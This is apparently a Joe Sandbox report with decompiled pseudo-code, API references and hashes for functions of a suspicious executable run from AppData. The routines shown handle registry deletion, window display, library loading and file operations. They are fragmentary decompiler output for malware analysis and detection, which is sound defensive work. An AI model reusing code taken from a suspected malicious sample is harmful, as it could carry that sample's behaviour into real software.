API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402434(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402434
0x00402434
0x00402437
0x0040243a
0x00402476
0x0040247b
0x00000000
0x0040243c
0x0040243e
0x00402443
0x00402447
0x0040292e
0x0040292e
0x0040244d
0x0040245d
0x0040245f
0x0040247d
0x0040247f
0x00000000
0x00402485
0x0040247f
0x00402447
0x00402c2d
0x00402c39

APIs

RegDeleteValueW.ADVAPI32 ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 0cca38afaa8380f0ac61552768d3dc96408867fd1b16d355a372d399741288c6
Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
Opcode Fuzzy Hash: 0cca38afaa8380f0ac61552768d3dc96408867fd1b16d355a372d399741288c6
Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E

Uniqueness

Uniqueness Score: -1.00%

Function 0040579D Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040579D(signed int __eax) {
				struct HWND__* _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42a288;
				_t10 =  *0x42a28c;
				__imp__OleInitialize(0); // executed
				 *0x42a320 =  *0x42a320 | __eax;
				E00404610(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x818;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x42a2ec =  *0x42a2ec + 1;
				}
				L7:
				E00404610(0x404);
				__imp__OleUninitialize();
				return  *0x42a2ec;
			}

0x0040579e
0x004057a5
0x004057ad
0x004057b3
0x004057bb
0x004057c2
0x004057c4
0x004057c7
0x004057c7
0x004057cc
0x00000000
0x00000000
0x004057dd
0x004057e5
0x00000000
0x00000000
0x004057e7
0x00000000
0x004057e5
0x004057e9
0x004057e9
0x004057ef
0x004057f4
0x004057f9
0x00405806

APIs

OleInitialize.OLE32(00000000), ref: 004057AD

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

OleUninitialize.OLE32 ref: 004057F9

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: b14588aebbadd05bc97f1dd14ffe2b6982532d9bfcd69c4411fdff16e8679f7d
Instruction ID: 683c9d360a8619809caff371317e20043972a5eac84f98be19084c03997f3dfe
Opcode Fuzzy Hash: b14588aebbadd05bc97f1dd14ffe2b6982532d9bfcd69c4411fdff16e8679f7d
Instruction Fuzzy Hash: 84F09072600600CBD6215B54AD01B17B764EB84304F45447FFF89732F0DB7A48529A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
Opcode Fuzzy Hash: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x429230;
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x429244;
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402c2d
0x00402c39

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6e42f6c78eca4588dce9c075aa62587ec70203647e7e96efeb23ba61638e0b3d
Instruction ID: 7576989b042b157cf48fac083b749515e454fc9aff443d668f7e93ddc69dec41
Opcode Fuzzy Hash: 6e42f6c78eca4588dce9c075aa62587ec70203647e7e96efeb23ba61638e0b3d
Instruction Fuzzy Hash: 5DE08676B10114EBCB15DBA8EE9086EB3A5FB44310750487FE502B3290D6759C05CB3C

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\venxajlddf.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00406138
0x0040613e
0x00406143
0x0040614c
0x0040614c
0x00406155

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 73BF2B98 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E73BF2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73bf5050 != 0 && E73BF2ADB(_a4) == 0) {
					 *0x73bf5054 = _t93;
					if( *0x73bf504c != 0) {
						_t93 =  *0x73bf504c;
					} else {
						E73BF30C0(E73BF2AD5(), __ecx);
						 *0x73bf504c = _t93;
					}
				}
				_t28 = E73BF2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E73BF2AFD();
					_t72 = _a4;
					_t79 =  *0x73bf5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73bf5058 = _t72;
					E73BF2AF7();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x73bf5034 = _t33;
					 *0x73bf5038 = _t79;
					if( *0x73bf5050 != 0 && E73BF2ADB( *0x73bf5058) == 0) {
						 *0x73bf504c = _t94;
						_t94 =  *0x73bf5054;
					}
					_t80 =  *0x73bf5058;
					_a4 = _t80;
					 *0x73bf5058 =  *((intOrPtr*)(E73BF2AFD() + _t80));
					_t37 = E73BF2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E73BF2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E73BF2B14() + _a4 + _v8);
							_push(E73BF2B1E());
							if( *0x73bf5050 <= 0 || E73BF2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x73bf504c =  *0x73bf504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73bf5058;
					if( *0x73bf5058 == 0) {
						 *0x73bf504c = 0;
					}
					E73BF2B42(_t107, _a4,  *0x73bf5034,  *0x73bf5038);
					return _a4;
				}
				_push(E73BF2B14() + _a4);
				_t56 = E73BF2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E73BF2B26();
				_t87 = E73BF2B22();
				_t90 = E73BF2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x73bf2ba8
0x73bf2bb9
0x73bf2bc6
0x73bf2bda
0x73bf2bc8
0x73bf2bcd
0x73bf2bd2
0x73bf2bd2
0x73bf2bc6
0x73bf2be3
0x73bf2be8
0x73bf2bee
0x73bf2c32
0x73bf2c32
0x73bf2c37
0x73bf2c3c
0x73bf2c42
0x73bf2c44
0x73bf2c4a
0x73bf2c57
0x73bf2c59
0x73bf2c5e
0x73bf2c6b
0x73bf2c7e
0x73bf2c84
0x73bf2c8a
0x73bf2c8b
0x73bf2c91
0x73bf2c9d
0x73bf2ca3
0x73bf2cab
0x73bf2cac
0x73bf2caf
0x73bf2cba
0x73bf2cbc
0x73bf2cc8
0x73bf2cce
0x73bf2cd6
0x73bf2d02
0x73bf2d03
0x73bf2d05
0x73bf2d09
0x73bf2d09
0x73bf2d10
0x73bf2ce6
0x73bf2ce6
0x73bf2ce7
0x73bf2cf5
0x73bf2cfe
0x73bf2cfe
0x73bf2cd6
0x73bf2cba
0x73bf2d12
0x73bf2d19
0x73bf2d1b
0x73bf2d1b
0x73bf2d34
0x73bf2d42
0x73bf2d42
0x73bf2bf9
0x73bf2bfa
0x73bf2bff
0x73bf2c03
0x73bf2c08
0x73bf2c1c
0x73bf2c1d
0x73bf2c1e
0x73bf2c20
0x73bf2c25
0x73bf2c27
0x73bf2c27
0x73bf2c2a
0x73bf2c30
0x00000000

APIs

ReadFile.KERNELBASE(00000000), ref: 73BF2C57

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 96c881559c69557d93e5b82f5a15f5a2e71ab5e03acfb7479feae2c355a7b17e
Instruction ID: 20d8c3675bd440311148a6b7d9a89b2f1a7c369a2467d615fe4f2b2f3eec4943
Opcode Fuzzy Hash: 96c881559c69557d93e5b82f5a15f5a2e71ab5e03acfb7479feae2c355a7b17e
Instruction Fuzzy Hash: F9417DFA50020FAFEB25EF65DA84B593779EB44350F30B437E809CF540D639A6888B91

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402DA6(0xffffffd0);
				_t16 = E00402DA6(0xffffffdf);
				E00402DA6(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E0040699E(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00406428(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x0040292e
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x004022f1
0x004022f1
0x004022f1
0x00402c2d
0x00402c39

APIs

MoveFileW.KERNEL32 ref: 00401696

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: a58878bd09eabd37c2a753385f93d12ee34b17dd18e98857f8ebabd4f9d4e486
Instruction ID: be669950fb77a2d656db840ba494943e65029fea8fad8f9acd4f4e8736b9b328
Opcode Fuzzy Hash: a58878bd09eabd37c2a753385f93d12ee34b17dd18e98857f8ebabd4f9d4e486
Instruction Fuzzy Hash: 62F0BB31A08120E7CB11BBB55F4DE5E2154DF83364F24023FF011B11D1D9BDC95255AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004065AF();
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

